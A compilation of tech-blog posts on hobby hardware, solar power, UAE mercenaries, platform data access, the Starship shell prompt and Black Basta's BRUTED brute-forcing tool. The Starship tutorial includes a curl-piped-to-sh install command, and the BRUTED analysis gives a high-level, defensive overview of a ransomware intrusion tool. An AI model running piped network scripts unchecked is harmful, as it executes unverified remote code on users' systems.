A Modern Take on the Etch A Sketch
The Etch A Sketch is a classic children’s toy resembling a picture frame, where artwork is made by turning two knobs attached to a stylus inside the frame. The stylus scrapes off an aluminum powder, creating the image, which can then be erased by turning the frame upside down and shaking it to redistribute the powder back over the display. It’s completely offline and requires no batteries, though in our modern world connectivity and batteries seem to be more of a requirement than they were when the Etch A Sketch was first produced in the 1960s. Enter the Tilt-A-Sketch, a modern version of the classic toy.
Rather than use aluminum powder for the display, the Tilt-A-Sketch replaces it with an LED matrix and removes the stylus completely. There are no knobs on this device to control the path of the LED either; an inertial measurement unit senses the direction the toy is tilted while a microcontroller uses that input to light up a series of LEDs corresponding to the direction of tilt. There are a few buttons on the side of the device as well, which change the colors displayed by the LEDs, and similar to the original toy the display can be reset by shaking.
The Tilt-A-Sketch was built by [devitoal] as part of an art display which allows the visitors to create their own art. Housed in a laser-cut wooden enclosure the toy does a faithful job of recreating the original. Perhaps unsurprisingly, the Etch A Sketch is a popular platform for various projects that we’ve seen before including original toys modified with robotics to create the artwork and electronic recreations that use LED displays instead in a way similar to this project.
youtube.com/embed/KoSKXEI5jus?…
Solar Power, Logically
We’ve all seen the ads. Some offer “free” solar panels. Others promise nearly free energy if you just purchase a solar — well, solar system doesn’t sound right — maybe… solar energy setup. Many of these plans are dubious at best. You pay for someone to mount solar panels on your house and then pay them for the electricity they generate at — presumably — a lower cost than your usual source of electricity. But what about just doing your own setup? Is it worth it? We can’t answer that, but [Brian Potter] can help you answer it for yourself.
In a recent post, he talks about the rise of solar power and how it is becoming a large part of the power generation landscape. Interestingly, he presents graphs of things like the cost per watt of solar panels adjusted for 2023 dollars. In 1975, a watt cost over $100. These days it is about $0.30. So the price isn’t what slows solar adoption.
The biggest problem is the intermittent nature of solar. But how bad is that really? It depends. If you can sell power back to the grid when you have it to spare and then buy it back later, that might make sense. But it is more effective to store what you make for your own use.
That, however, complicates things. If you really want to go off the grid, you need enough capacity to address your peak demand and enough storage to meet demand over several days to account for overcast days, for example.
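As a back-of-the-envelope sketch of that sizing exercise (the numbers here are illustrative assumptions, not figures from the post):

```python
# Rough off-grid battery sizing: daily usage, days of autonomy to ride
# through overcast weather, and the fraction of capacity you can safely use.
daily_use_kwh = 30        # typical household draw (assumption)
autonomy_days = 3         # overcast days to cover (assumption)
usable_fraction = 0.8     # depth-of-discharge limit (assumption)

battery_kwh = daily_use_kwh * autonomy_days / usable_fraction
print(f"{battery_kwh:.1f} kWh of nameplate storage")  # 112.5 kWh of nameplate storage
```

Peak demand sizing works the same way for the inverter and panel array, which is why truly going off-grid costs so much more than a grid-tied system.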
There’s more to it than just that. Read the post for more details. But even if you don’t want solar, if you enjoy seeing data-driven analysis, there is plenty to like here.
Building an effective solar power system is within reach of nearly anyone these days. Some of the problems with solar go away when you put the cells in orbit. Of course, that always raises new problems.
Backyard Rope Tow from Spare Parts
A few years ago, [Jeremy Makes Things] built a rope tow in his back yard so his son could ski after school. Since the lifts at the local hill closed shortly after schools let out, this was the only practical way for his son to get a few laps in during the week. It’s cobbled together from things that [Jeremy] had around the house, and since the original build it’s sat outside for a few years without much use. There’s been a lot more snow where he lives this year though, so it’s time for a rebuild.
The power source for the rope tow is an old gas-powered snowblower motor, with a set of rollers and pulleys for the rope made out of the back end of a razor scooter. Some polyurethane was poured around the old wheel hub so that the rope would have something to grip onto. The motor needed some sprucing up as well, including carburetor adjustment, fuel tank repairs, and other maintenance before it could run again. With that out of the way, it could be hoisted back up a tree at the top of the hill and connected to the long rope.
This isn’t the first time [Jeremy] has had to perform major maintenance on this machine either. Three years ago it needed plenty of work, especially around the polyurethane wheel, where [Jeremy] also had to machine a new wheel bearing in addition to all the other repairs that time around. From the looks of things, though, it’s a big hit with his son, who zips right back up the hill after each ski run. Getting to the top of a ski run with minimal effort has been a challenge for skiers and snowboarders alike for as long as the sport has been around, and we’ve seen all kinds of unique solutions to that problem over the years.
Laser Harp Sets the Tone
In many ways, living here in the future is quite exciting. We have access to the world’s information instantaneously and can get plenty of useful tools and hardware delivered to our homes in ways that people in the past, with only a Sears catalog, could only dream of. Lasers are of course among the exciting hardware available, and can be purchased with extremely high power levels. Provided the proper safety precautions are taken, that can lead to some interesting builds like this laser harp, which uses a 3W laser for its strings.
[Cybercraftics]’ musical instrument uses a single laser to generate seven harp strings, with a fast stepper motor rotating a mirror to precise locations and generating the effect via persistence of vision. Although he originally planned to use one Arduino for this project, the precise timing needed to keep the strings in the right place was being disrupted by the MIDI and other musical parts of the project, so he split those out to a second Arduino.
Although his first prototype worked, he did have to experiment with the sensors used to detect his hand position on the instrument quite a bit before getting good results. This is where the higher power laser came into play, as the lower-powered ones weren’t quite bright enough. He also uses a pair of white gloves which help illuminate a blocked laser. With most of the issues ironed out, [Cybercraftics] notes that there’s room for improvement but still has a working instrument that seems like a blast to play. If you’re still stuck in the past without easy access to lasers, though, it’s worth noting that there are plenty of other ways to build futuristic instruments as well.
youtube.com/embed/c5HmCTt6hQ4?…
Against Pirates and Cybercriminals, the Emirates Deploy the New Mercenaries
The United Arab Emirates (UAE) represent a unique case in the employment of mercenaries, differing from the experiences in Angola, Sierra Leone, and Nigeria in both motivation and manner of use. While in Africa the recourse to mercenaries has often been tied to the survival of fragile regimes in contexts marked by instability and internal conflict, the Emirates stand out for their political stability and oil wealth. The country nevertheless suffers from a chronic shortage of manpower and technological expertise, especially in the military sphere. This situation has pushed the government to use mercenaries to fill those gaps, without drawing the same international criticism leveled at African states. That is attributable to the Emirates’ geopolitical weight: their oil reserves and wealth lead Western powers to be more cautious in voicing condemnation, reserving their harshest criticism for more fragile, less influential states.
Two approaches: internal security and foreign policy
The Emirates’ use of mercenaries follows two main lines. The first concerns strengthening internal security by supporting the structures that protect the regime. In particular, mercenaries were instrumental in overseeing and creating the Presidential Guard, an elite corps designed to safeguard the Emirati leadership from coups or internal threats, often attributed to Iran. This use allows the government to proactively confront internal subversion and consolidate political stability.
The second line concerns the role of mercenaries in projecting Emirati power beyond national borders, exploiting them as military instruments in pursuit of foreign policy goals. The Emirates, for example, support Khalīfa Haftar and his Libyan National Army through financing and the deployment of the Wagner Group. In Yemen, mercenary involvement has been just as significant: the Emirates used contractors alongside their troops in the war against the Houthis, a conflict waged with the support of local tribal alliances. To lighten the burden on their own armed forces, the Emirates deployed around 450 Latin American contractors out of a total of 1,800 men stationed at the Abu Dhabi base. This approach reflects the will of a government determined to defend its interests without directly involving its own citizens in combat operations.
The advantages of plausible deniability: the case of Somalia
An emblematic example of this strategy is the anti-piracy operation conducted in Puntland, a Somali region. Through a subsidiary of Reflex Ltd, a company originally tied to Erik Prince, the Emirates financed the Puntland Maritime Police Force (PMPF). This unit, made up of former South African mercenaries and local contractors, was tasked with countering pirate activity along Somalia’s northern coasts. Equipped with helicopters, speedboats, and armored vehicles, the PMPF operated with a level of aggressiveness beyond that typical of government forces. While it is not confirmed that the unit engaged pirates in direct clashes, it stood out for its use of lethal force in offensive, rather than defensive, operations.
The United Nations voiced concerns about the use of South African mercenaries and the PMPF’s training methods, but the Emirates claimed the operation as a success, one that temporarily reduced the piracy threat to international shipping. When the mission became public knowledge, however, the Emirati government quickly shut the program down to avoid damage to its international image, giving up the chance to exploit plausible deniability any further.
Cyber mercenaries: the Emirates’ strategy
The Emirates have also invested heavily in cybersecurity, using cyber mercenaries to extend their influence. Through DarkMatter, a powerful local company, the country launched operations aimed at strengthening digital control both domestically and abroad. A significant example is Project Raven, a program that recruited dozens of former American intelligence agents to conduct surveillance operations against foreign governments, militants, and human rights activists.
These activities have generated tensions with neighboring countries such as Qatar, which accused the Emirates of hacking official news agencies and social media channels, reopening a long-running feud between the Gulf monarchies. The use of contractors with advanced cybersecurity skills reflects the growing importance of this dimension for a small country like the Emirates, which wields unconventional tools to compete in an ever more complex geopolitical arena.
Who is the 21st-century mercenary?
The Emirates’ recourse to mercenaries raises a fundamental question: how do we define the modern mercenary? The examples of EO in Angola and Sierra Leone, of STTEP in Nigeria, and of the Emirati operations show that mercenaries, whether individuals or affiliates of companies, are increasingly relevant geostrategic instruments. These actors operate without ties to their state of origin, offering offensive and defensive security services to governments that want to strengthen their power without direct entanglement.
The legitimacy of these operations is often contested, however. The United States and the United Kingdom, for example, tend to distinguish between “military contractors,” considered legitimate, and “mercenaries,” a category demonized for political reasons. This double standard reflects the great powers’ interest in keeping control over international security dynamics, protecting their own interests and delegitimizing independent actors.
The United Arab Emirates are a striking example of how small, resource-rich states can exploit mercenaries to expand their influence, both regionally and internationally. Yet the recourse to these forces also highlights a double standard in global reactions. While fragile countries that depend on mercenaries face harsh criticism, wealthy states like the Emirates receive more indulgent treatment, thanks to their strategic importance.
This asymmetry reflects a geopolitical dynamic in which independent mercenary companies have the potential to profoundly alter the status quo, especially in regions such as Africa and the Middle East. Although many governments see the use of mercenaries as a pragmatic solution, it raises ethical and political questions that risk amplifying international tensions and fueling new forms of disguised neocolonialism.
The article Contro i pirati e i cybercriminali gli Emirati mettono in campo i nuovi mercenari originally appeared on InsideOver.
Three SPI Busses Are One Too Many on This Cheap Yellow Display
The Cheap Yellow Display may not be the fastest of ESP32 boards with its older model chip and 4 MB of memory, but its low price and useful array of on-board peripherals have made it something of a hit in our community. Getting the most out of the hardware still presents some pitfalls though, as [Mark Stevens] found out when using one for an environmental data logger. The problem was that the display, touch sensor, and SD card sat on three different SPI busses, of which the software would only recognise two. His solution involves a simple hardware mod, which may benefit many others doing similar work.
It’s simple enough: put the LCD and SD card on the same bus, retaining their individual chip select lines. There’s a track to be cut and a bit of wiring to be done, but nothing that should tax most readers too much. We’re pleased to see more work being done with this board, as it remains a promising platform, and any further advancements for it are a good thing. If you’re interested in giving it a go, then we’ve got some inspiration for you.
Linux Fu: A Warp Speed Prompt
If you spend a lot of time at the command line, you probably have either a very basic prompt or a complex, information-dense prompt. If you are in the former camp, or you just want to improve your shell prompt, have a look at Starship. It works on the most common shells on most operating systems, so you can use it everywhere you go, within reason. It has the advantage of being fast, and you can customize it all you want.
What Does It Look Like?
It is hard to explain exactly what the Starship prompt looks like. First, you can customize it almost infinitely, so there’s that. Second, it adapts depending on where you are. So, for example, in a git-controlled directory, you get info about the git status unless you’ve turned that off. If you are in an ssh session, you’ll see different info than if you are logged in locally.
However, here’s a little animation from their site that will give you an idea of what you might expect:
hackaday.com/wp-content/upload…
Installation
The web site says you need a Nerd Font in your terminal. I didn’t remember doing that on purpose, but apparently I had one already.
Next, you just have to install using one of the methods they provide, which depends on your operating system. For Linux, you can run the installer:
curl -sS starship.rs/install.sh | sh
Sure, you should download it first and look to make sure it won’t reformat your hard drive or something, but it was fine when we did it.
Finally, you have to run an init command. How you do that depends on your shell and they have plenty of examples. There’s even a way to use it with cmd.exe on Windows!
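For bash, for example, the init hook is a single line at the end of your shell startup file (other shells use their own equivalents, listed in the Starship docs):

```shell
# Append to ~/.bashrc so every new shell loads the Starship prompt
eval "$(starship init bash)"
```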
Customization
The default isn’t bad but, of course, you are going to want to change things. Oddly, the system doesn’t create a default configuration file. It just behaves a certain way if it doesn’t find one. You must make your own ~/.config/starship.toml file. You can change where the file lives using an environment variable, if you prefer, but you still have to create it.
The TOML file format has sections like an INI file. Just be aware that any global options have to come before any section (that is, there’s no [global] tag). If you put a global option toward the bottom of the file, it won’t seem to work, because it has silently become part of the last section.
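A minimal file illustrating that ordering rule (command_timeout and the [package] module are real Starship options, but check the docs for your version):

```toml
# Global options first...
command_timeout = 500   # milliseconds

# ...then module sections; anything below a [section] belongs to it
[package]
disabled = true
```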
There are a number of modules and each module reads data from a different section. For example, on my desktop I have no need for battery status so:
[battery]
disabled = true
Strings
In the TOML file you can use single or double quotes. You can also triple a quote to let a string break across lines (though the line breaks don’t become part of the string). Single-quoted strings are treated as literals, while double-quoted strings require escape characters for special things.
You can use variables in strings like $version or $git_branch. You can also place part of a string in brackets and then put formatting for that part in parentheses immediately following. For example:
'[off](fg:red bold)'
Finally, you can have a variable print only if it exists:
'(#$id)'
If $id is empty, this does nothing. Otherwise, it will print the # and the value.
Globals and Modules
You can find all the configuration options (and there are many) in the Starship documentation. Of primary interest is the global format variable. This determines which modules appear and in what order. You can also use $all to pull in all the otherwise unspecified modules. By default, the format variable starts with $username $hostname. Suppose you wanted it to be different. You could write:
format='$hostname ! $username $all'
You’ll find many modules that show the programming language used for this directory, version numbers, and cloud information. You can shut things off, change formatting, or rearrange. Some user-submitted customizations are available, too. Can’t find a module to do what you want? No problem.
Super Custom
I wanted to show the status of my watercooler, so I created a custom section in the TOML file:
[custom.temp]
command = 'temp-status|grep temp|cut -d " " -f 7'
when = true
format='$output°'
The command output winds up in, obviously, $output. In this case, I always want the module to output and the format entry prints the output with a degree symbol after it. Easy!
Of Course, There are Always Others
There are other prompt helpers out there, especially if you use zsh (e.g., Oh My Zsh). However, if you aren’t on zsh, your options are more limited. Oh My Posh is another cross-shell entry into the field. Of course, you don’t absolutely need any of these. They work because shells give you variables like PS1 and PROMPT_COMMAND, so you can always roll your own to be as simple or complex as you like. People have been doing their own for a very long time.
If you want to do your own for bash, you can get some help online. Or, you could add help to bash, too.
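As a minimal sketch of the roll-your-own route for bash (the function names here are our own invention, and the git branch lookup is just one thing you might fold in):

```shell
# Hand-rolled prompt for ~/.bashrc: user@host, working directory,
# and the current git branch (if any) rebuilt before every prompt.
git_branch() {
  git symbolic-ref --short HEAD 2>/dev/null
}
set_prompt() {
  local branch
  branch=$(git_branch || true)
  # ${branch:+ ($branch)} expands only when $branch is non-empty
  PS1="\u@\h:\w${branch:+ ($branch)}\$ "
}
PROMPT_COMMAND=set_prompt
```

Because PROMPT_COMMAND runs before each prompt is drawn, the branch name stays current as you cd around, which is essentially what Starship's git module does for you automatically.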
Social media is a black box. Here's how to fix that
THIS IS A BONUS EDITION OF DIGITAL POLITICS. I'm Mark Scott, and I don't usually speak about my day job in this newsletter. But today, that changes.
One of my goals this year is to help open up social media platforms to greater outside transparency. To do that, I'm working on ways to jumpstart data access to these platforms, or efforts to allow independent researchers to delve into the public data that these firms collect on all of us.
It's not an easy task — especially because any form of such data access must protect people's privacy, at all cost, and uphold the highest levels of security.
But, for me, it's a fundamental step in filling the democratic deficit associated with how social media may (or may not) affect our everyday lives.
Below is a glimpse of what I've been up to in recent months. It's a cross-post from Tech Policy Press.
Let's get started.
What happens online doesn't just stay online
IT'S HARD TO REMEMBER A WORLD WITHOUT SOCIAL MEDIA. From the United States to Brazil, people now spend hours on TikTok, Instagram, and YouTube each day, and these platforms have become embedded in everything from how we talk to friends and family to how we elect our national leaders.
But one thing is clear: despite researchers’ efforts to decipher social media’s impact, if any, on countries’ democratic institutions, still no one has a clear understanding of how these global platforms work. What’s worse, we have less insight into what happens on these platforms in 2025 than we did five years ago.
This is a problem.
It’s a problem for those who believe these tech companies censor people’s voices online. It’s a problem for those who believe these firms do not do enough to police their platforms for harmful content. And it’s a problem for democratic countries whose political systems are fracturing under increased polarization — some of which is amplified via social media.
In 2025, there is a fundamental disconnect between what happens on social media and what academics, independent researchers and regulators understand about these platforms.
That has led to a democratic deficit. No one can quantify the effect, if any, these platforms have on public discourse. It has also led to a policymaking void. Lawmakers worldwide don’t know what steps are needed, whether via potential new legislation, voluntary standards, or doubling down on existing efforts, to reduce online harm on social media while upholding individuals’ right to free speech.
In short, we just don’t know enough about social media’s impact on society.
Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com
Without quantifiable evidence of harm (or lack of it) — driven by independent outside access to platform data, or the ability for people to research the inner workings of these social media giants — there is no way to make effective online safety legislation, uphold people’s freedom of expression, and hold companies to account when, inevitably, things go wrong.
And yet, there is a way forward. One that relies on the protection of people’s privacy and free speech. One that limits government access to people’s social media posts. And one that gives outside researchers the ability to kick the tires on how these platforms operate by granting them access to public data in ways that improve society’s understanding of these social media giants.
What are we going to do about it?
To meet this need, Columbia World Projects at Columbia University and the Hertie School’s Centre for Digital Governance have been running workshops with one aim in mind: How to build on emerging online safety regimes worldwide — some of which allow, or will soon allow, for such mandatory data access from the platforms to outside groups — to fill this democratic deficit.
With support from the Knight Foundation, that has involved bringing together groups of academic and civil society researchers, data infrastructure providers and national regulators for regular meetings to hash out what public and private funding is required to turn such data access from theory into reality.
The initial work has focused on the European Union’s Digital Services Act, which includes specific mandatory requirements for outsiders to delve into platform data.
But as other countries bring online similar data access regimes, the hope is to provide a route for others to follow that will build greater capacity for researchers to conduct this much-needed work; support regulators in navigating the inherent difficulties in opening up such platforms’ public data to outsiders; and ensure that people’s social media data is protected and secured, at all cost, from harm and surveillance.
As with all research, much relies on funding. Just because a country’s online safety laws dictate that outsiders can access social media data does not mean that researchers can just flick on a switch and get to work.
At every turn, there’s a need for greater public and private backing.
As part of the ongoing workshops, the discussions have focused on four areas where we believe targeted funding support from a variety of public and private donors can make the most impact. Taken together, it represents an essential investment in our wider understanding of social media that will ensure companies uphold their stated commitments to make their platforms accountable and transparent to outside scrutiny.
Four ways to make social media giants more accountable
The first component is the underlying infrastructure needed to carry out this work. Currently, accessing social media data is confined to the few, not the many. Researchers either need existing relationships with platforms or access to large funding pots to pay for cloud storage, technical analysis tools and other data access techniques that remain off limits to almost everyone.
Currently, there is a cottage industry of data providers — some commercial, others nonprofit — that provide the baseline infrastructure, in terms of access to platforms, analytics tooling and user-friendly research interfaces. Yet to meet researchers’ needs, as well as the growing regulatory push to open up social media giants to greater scrutiny, more needs to be done to make such infrastructure readily accessible, particularly to experts in Global Majority countries.
That includes scaling existing data infrastructure, making analytical tools more universally available to researchers, and using a variety of techniques — from using Application Programming Interfaces, or APIs, that plug directly into platform data to allowing researchers to scrape social media sites in the public interest to promoting “data donations” directly from users themselves — to meet different research needs.
The second focus has been on the relationships between researchers and regulators. As more countries pursue online safety legislation, there is a growing gap between in-house regulatory capacity and outsider expertise that needs to be closed for these regimes to operate effectively. Yet currently, few, if any, formal structures exist for researchers and regulators to share best practices — all while maintaining a safe distance via so-called “Chinese Walls” between government oversight and researcher independence.
What is needed are more formal information-sharing opportunities between regulators and researchers so that online safety regimes are based on quantifiable evidence — often derived from outside data access to social media platforms. That may include regular paid-for secondments for researchers to embed inside regulators to share their knowledge; the development of routine capacity building and information sharing to understand the evolving research landscape; and a shift away from informal networks between some researchers and regulators into a more transparent system that is open to all.
For that to work, a third element is needed in terms of greater capacity building — in the form of technical assistance, data protection and security training and researcher community engagement. Currently, outside experts have varying levels of technical understanding, policy expertise and knowledge of privacy standards that hamstring greater accountability and transparency for platforms. If people’s public social media data is not secured and protected against harm, for instance, then companies will rightly restrict access to safeguard their users from Cambridge Analytica-style leakages of information.
What is needed is the expansion of existing research networks so that data access best practices can be shared with as many groups as possible. Technical support to maintain the highest data protection standards — in the form of regular training of researchers and the development of world-leading privacy protocols for all to use — similarly will provide greater legal certainty for social media users. The regular convening of researchers so that people can learn from each other about the most effective, and secure, way to conduct such research will also democratize current data access that has often been limited to a small number of experts.
The fourth component of the workshops is the most important: how to maintain independence between outside researchers and regulators in charge of the growing number of online safety regimes worldwide. It is important for both sides to work effectively with each other. But neither researchers nor regulators should become beholden — or perceived to be beholden — to each other. Independence for regulators to conduct their oversight and for researchers to criticize these agencies is a fundamental part of how democracies function.
That will require forms of public-private funding to support ongoing data access work to create strict safeguards between researchers and regulators. That’s a tricky balance between supporting close ties between officials and outsiders, while similarly ensuring that neither side feels subordinate to the other. To meet that balance, a mixture of hands-off public support and non-government funding will be critical.
Such structures already exist in other industries, most notably in the medical research field. They represent a clear opportunity to learn from others as outside researchers and regulators push for greater accountability and transparency for social media companies.
Chemistry Meets Mechatronics in This Engaging Art Piece
There’s a classic grade school science experiment that involves extracting juice from red cabbage leaves and using it as a pH indicator. It relies on anthocyanins, pigmented compounds that give the cabbage its vibrant color but change hue depending on the acidity of their environment, from pink in acidic conditions to green at higher pH. And anthocyanins are exactly what power this unusual kinetic art piece.
Even before it goes into action, [Nathalie Gebert]’s Anthofluid is pretty cool to look at. The “canvas” of the piece is a thin chamber formed by plexiglass sheets, one of which is perforated by an array of electrodes. A quartet of peristaltic pumps fills the chamber with a solution of red cabbage juice from a large reservoir, itself a mesmerizing process as the purple fluid meanders between the walls of the chamber and snakes around and between the electrodes. Once the chamber is full, an X-Y gantry behind the rear wall moves to a random set of electrodes, deploying a pair of conductors to complete the circuit. When a current is applied, tendrils of green and red appear, not by a pH change but rather by the oxidation and reduction reactions occurring at the positive and negative electrodes. The colors gently waft up through the pale purple solution before fading away into nothingness. Check out the video below for the very cool results.
We find Anthofluid terribly creative, especially in the use of such an unusual medium as red cabbage juice. We also appreciate the collision of chemistry, electricity, and mechatronics to make a piece of art that’s so kinetic but also so relaxing at the same time. It’s the same feeling that [Nathalie]’s previous art piece gave us as it created images on screens of moving thread.
youtube.com/embed/sC4Rg1wRP68?…
PiEEG Kit is a Self-Contained Biosignal Laboratory
Back in 2023, we first brought you word of the PiEEG: a low-cost Raspberry Pi based device designed for detecting and analyzing electroencephalogram (EEG) and other biosignals for the purposes of experimenting with brain-computer interfaces. Developed by [Ildar Rakhmatulin], the hardware has gone through several revisions since then, with this latest incarnation promising to be the most versatile and complete take on the concept yet.
At the core of the project is the PiEEG board itself, which attaches to the Raspberry Pi and allows the single-board computer (SBC) to interface with the necessary electrodes. For safety, the PiEEG and Pi need to remain electrically isolated, so they have to be powered by a battery. This is no problem while capturing data, as the Pi has enough power to process the incoming signals using the included Python tools, but it could be an issue if, say, you wanted to connect the PiEEG system to another computer.
For the new PiEEG Kit, the hardware is now enclosed in its own ABS carrying case, which includes an LCD right in the lid. While you’ve still got to provide your own power (such as a USB battery bank), having the on-board display removes the need to connect the Pi to some other system to visualize the data. There’s also a new PCB that allows the connection of additional environmental sensors, breakouts for I2C, SPI, and GPIO, three buttons for user interaction, and an interface for connecting the electrodes that indicates where they should be placed on the body right on the silkscreen.
The crowdsourcing campaign for the PiEEG Kit is set to begin shortly, and the earlier PiEEG-16 hardware is available for purchase currently if you don’t need the fancy new features. Given the fact that the original PiEEG was funded beyond 500% during its campaign in 2023, we imagine there’s going to be plenty of interest in the latest-and-greatest version of this fascinating project.
youtube.com/embed/vVgMHCaZgIQ?…
BRUTED: The Black Basta Tool That Opens the Door to Ransomware
In the cybersecurity landscape, the evolution of ransomware threats remains one of the most complex challenges facing companies and security experts. One of the most active and dangerous groups on the current scene is Black Basta, which since 2022 has established its presence in the cybercrime sector through targeted attacks on critical corporate infrastructure. What sets it apart is not only its use of the Ransomware-as-a-Service (RaaS) model, but also its adoption of sophisticated tools for the initial compromise of target systems.
One of these tools is BRUTED, an automated brute-forcing and credential-stuffing framework designed to compromise Internet-exposed edge network devices such as firewalls, VPNs, and other remote-access services. Its efficiency and adaptability make it a particularly insidious weapon in the hands of experienced cybercriminals.
This analysis takes a closer look at how BRUTED works, Black Basta’s modus operandi, and the implications for information security.
Black Basta: A Growing Cybercriminal Organization
Black Basta has established itself as one of the most active and destructive ransomware groups of recent years. Operating as Ransomware-as-a-Service (RaaS), it provides affiliates with tools to carry out highly targeted attacks, sharing a portion of the ransom profits with them. The main features of their strategy include:
- Double extortion: after encrypting the victim’s data, the group threatens to publish the stolen information, increasing the pressure to pay.
- Targeting of critical sectors: the sectors hit hardest by Black Basta’s attacks include:
- Business services, for their high commercial value.
- Manufacturing, where operational disruption can cause enormous economic losses.
- Critical infrastructure, often characterized by poor resilience to cyberattacks.
- Use of advanced tools such as Cobalt Strike, Brute Ratel and, more recently, BRUTED, to maximize the effectiveness of attacks.
The introduction of BRUTED has allowed Black Basta to automate and scale its initial-access attacks, making it even harder for companies to defend themselves.
BRUTED: How Does It Work and What Are Its Targets?
BRUTED is a highly advanced attack framework that automates brute forcing and credential stuffing. Its main purpose is to identify vulnerable network devices and gain initial access to corporate systems.
Its main capabilities include:
- Automated Internet scanning to identify exposed, potentially vulnerable devices.
- Brute-force login attempts leveraging databases of stolen or weak credentials.
- Multi-vendor adaptability, with specific support for different types of firewalls, VPNs, and remote-access gateways.
- Persistence and lateral movement, facilitating access to internal systems once the security perimeter has been breached.
Once initial access is obtained, attackers use the framework to:
- Compromise key devices such as firewalls and VPNs.
- Move laterally within the network to gain higher privileges.
- Deploy the Black Basta ransomware, encrypting critical systems and halting business operations.
BRUTED therefore represents a step forward in attack automation, allowing Black Basta affiliates to operate more efficiently and at greater scale.
Analyzing the Attack Map: A Detailed View
The accompanying image provides an extremely detailed graphical representation of the BRUTED-based attack infrastructure used by Black Basta. Several key layers of the operation emerge from it:
1. Attack Origin (Left Side)
- Connections to Russia: the image suggests a link with malicious actors operating from the Russian Federation.
- Most affected sectors: business services and manufacturing rank among the main targets.
- Attack tools: besides BRUTED, post-exploitation tools such as Cobalt Strike and Brute Ratel are used.
2. Compromised Hosts and Attack Techniques (Center)
- The central cluster of the image shows a set of Internet-exposed devices.
- Each node represents a vulnerable host, likely identified through automated scanning.
- The connections between nodes indicate targeted attacks using large-scale brute force and credential stuffing.
3. Indicators of Compromise (Right Side)
- The list of compromised domains and IPs shows the infrastructure used by Black Basta for command and control (C2).
- Distinct colors represent the criticality level and the association with specific attacks.
- IPs and DNS entries highlighted in red correspond to infrastructure that is currently active and dangerous.
This graphical analysis provides a clear picture of the attack techniques and allows cybersecurity experts to identify key indicators of compromise (IoCs).
How to Defend Against BRUTED and Black Basta
To mitigate the risk of compromise by BRUTED and Black Basta, companies must adopt advanced security strategies, including:
- Network endpoint protection:
- Block unnecessary remote access.
- Configure firewalls to limit suspicious access.
- Secure credential management:
- Enforce multi-factor authentication (MFA).
- Avoid reusing weak passwords.
- Active monitoring of indicators of compromise:
- Keep blacklists of malicious IPs and domains constantly updated.
- Analyze anomalous login attempts and block suspicious addresses.
- Patch management:
- Keep firewall and VPN firmware and software up to date.
- Apply security patches against known vulnerabilities.
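The active-monitoring recommendation can be made concrete with a few lines of code. This is only a minimal sketch of the idea — the event format, IP addresses, and failure threshold below are illustrative assumptions, not anything taken from Black Basta reporting:

```python
from collections import Counter

FAILED_THRESHOLD = 5  # assumed threshold; tune to your own environment


def suspicious_ips(events, threshold=FAILED_THRESHOLD):
    """Return the set of source IPs whose failed-login count meets the threshold.

    `events` is an iterable of (ip, outcome) pairs, standing in for parsed
    VPN/firewall authentication logs.
    """
    failures = Counter(ip for ip, outcome in events if outcome == "FAIL")
    return {ip for ip, count in failures.items() if count >= threshold}


# Example: one IP hammering logins, another with a single failure then success.
events = [("203.0.113.7", "FAIL")] * 6 + [("198.51.100.2", "FAIL"), ("198.51.100.2", "OK")]
print(sorted(suspicious_ips(events)))  # → ['203.0.113.7']
```

A real deployment would feed this from live log ingestion and push the flagged addresses to a firewall blocklist, but the counting logic is the core of detecting brute-force and credential-stuffing attempts.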
The integration of BRUTED into Black Basta’s attack model represents an evolution in cybercrime, increasing the speed and scalability of attacks. Companies must adopt proactive measures and solid defensive strategies to counter this growing threat.
An approach based on zero trust, MFA, and active monitoring is essential to defend effectively against these constantly evolving threats.
The article BRUTED: Il Tool di Black Basta che Apre le Porte ai Ransomware originally appeared on il blog della sicurezza informatica.
World’s Smallest Blinky, Now Even Smaller
Here at Hackaday, it’s a pretty safe bet that putting “World’s smallest” in the title of an article will instantly attract comments claiming that someone else built a far smaller version of the same thing. But that’s OK, because if there’s something smaller than this nearly microscopic LED blinky build, we definitely want to know about it.
The reason behind [Mike Roller]’s build is simple: he wanted to build something smaller than the previous smallest blinky. The 3.2-mm x 2.5-mm footprint of that effort is a tough act to follow, but technology has advanced somewhat in the last seven years, and [Mike] took advantage of that by basing his design on an ATtiny20 microcontroller in a WLCSP package and an 0201 LED, along with a current-limiting resistor and a decoupling capacitor. Powering the project is a 220-μF tantalum capacitor, which at a relatively whopping 3.2 mm x 1.6 mm determines the size of the PCB, which [Mike] insisted on using.
Assembling the project was challenging, to say the least. [Mike] originally tried a laboratory hot plate to reflow the board, but when the magnetic stirrer played havoc with the parts, he switched to a hot-air rework station with a very low airflow. Programming the microcontroller seemed like even more of a challenge: when the pogo pins he was planning to use proved too large for the job, he tacked leads made from 38-gauge magnet wire to the board with the aid of a micro hot-air tool.
After building version one, [Mike] realized that even smaller components were available, so there’s now a 2.4 mm x 1.5 mm version using an 01005 LED. We suspect there’ll be a version 3.0 soon, though — he mentions that the new TI ultra-small microcontrollers weren’t available yet when he pulled this off, and no doubt he’ll want to take a stab at this again.
Pick Up A Pebble Again
A decade ago, smartwatches were an unexplored avenue full of exotic promise. There were bleeding-edge and eye-wateringly expensive platforms from the likes of Samsung or Apple, but for the more experimental among technophiles there was the Pebble. Based on a microcontroller and with a relatively low-resolution display, it was the subject of a successful crowdfunding campaign and became quite the thing to have. Now long gone, it has survived in open-source form, and if you’re a Pebble die-hard you can even buy a new Pebble. We’re not sure about their choice of name, though; we think calling something the “Core 2 Duo” might attract the attention of Intel’s lawyers.
The idea is broadly the same as the original, and it remains compatible with software from back in the day. New are some extra sensors, longer battery life, and an nRF52840 BLE microcontroller running the show. It certainly captures the original well; however, we’re left wondering whether a 2013 experience still cuts it in 2025 at that price. We suspect in that vein it would be the ideal complement to your game controller when playing Grand Theft Auto V, another evergreen 2013 hit.
We look forward to seeing where this goes, and we reported on the OS becoming open source earlier this year. Perhaps someone might produce a piece of open source hardware to do the same job?
Modern Computing’s Roots or The Manchester Baby
In the heart of Manchester, UK, a groundbreaking event took place in 1948: the first modern computer, known as the Manchester Baby, ran its very first program. The Baby’s ability to execute stored programs, developed with guidance from John von Neumann’s theory, marks it as a pioneer in the digital age. This fascinating chapter in computing history not only reshapes our understanding of technology’s roots but also highlights the incredible minds behind it. The original article, including a video transcript, sits here at [TheChipletter]’s.
